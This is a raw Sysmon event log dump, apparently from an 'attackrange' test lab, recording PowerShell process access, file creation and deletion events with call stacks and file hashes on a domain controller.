08:08:02.978{466BC892-F862-60EB-F97D-00000000CF01}9624ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_pjlfnqqq.tuu.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001054810Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:02.891{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_pjlfnqqq.tuu.ps12021-07-12 08:08:02.891 10341000x80000000000000001054809Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.821{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000810416Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:02.528{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28874BE5A5C97FFF369C0A3FD5A7B26F,SHA256=7B0B7A65EB4AE91AE67C5D1ADAF1EE778176DE22C19E44B4C7EF7BDCC629967B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054808Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:02.774{466BC892-F862-60EB-F97D-00000000CF01}96245604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054807Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.774{466BC892-F862-60EB-F97D-00000000CF01}96245604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054806Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:02.774{466BC892-F862-60EB-F97D-00000000CF01}96245604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054805Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:02.774{466BC892-F862-60EB-F97D-00000000CF01}96245604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054804Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:02.774{466BC892-F862-60EB-F97D-00000000CF01}96245604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+609de|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054803Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:02.774{466BC892-F862-60EB-F97D-00000000CF01}96245604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054802Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:02.774{466BC892-F862-60EB-F97D-00000000CF01}96245604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054801Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.774{466BC892-F862-60EB-F97D-00000000CF01}9624ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf77bf5f.TMPMD5=2C0FD6F951FA1D507F7B5C46BB749BFE,SHA256=500857DA7D87C376CB267338351A1D967C9EA82A3709662A2377A28AD4E79CBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054800Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:02.721{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054799Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.659{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054798Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:02.659{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054797Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.590{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054796Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:02.590{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054795Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.590{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054794Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:02.536{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F862-60EB-FA7D-00000000CF01}136C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054793Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.520{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F862-60EB-FA7D-00000000CF01}136C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054792Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.442{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054791Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:02.442{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054790Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.442{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054789Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:02.442{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054788Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.441{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F862-60EB-FA7D-00000000CF01}136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054787Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.441{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F862-60EB-FA7D-00000000CF01}136C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001054786Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.441{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F862-60EB-FA7D-00000000CF01}136C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054785Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.441{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F862-60EB-FA7D-00000000CF01}136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001054784Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.373{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnk2021-07-12 07:44:24.124 23542300x80000000000000001054783Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.373{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnkMD5=1BAD03CA3931966D8844C2E4D7C2B462,SHA256=2877D60F7760632BB56A991256120A7A99021E6F2BC7844553E8DAC6ABE30C3B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001054782Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:02.342{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\ws.ps1.lnk2021-07-12 07:57:26.859 23542300x80000000000000001054781Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.342{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\ws.ps1.lnkMD5=1FB9D0C5368738163DC5B545A4AA36AD,SHA256=1926FDD24212F26A25F9A93489001D4F4C00E3A28BE89F6C40E7BA7EB272A24E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054780Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.289{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F862-60EB-FA7D-00000000CF01}136C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054779Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.289{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F862-60EB-FA7D-00000000CF01}136C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054778Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
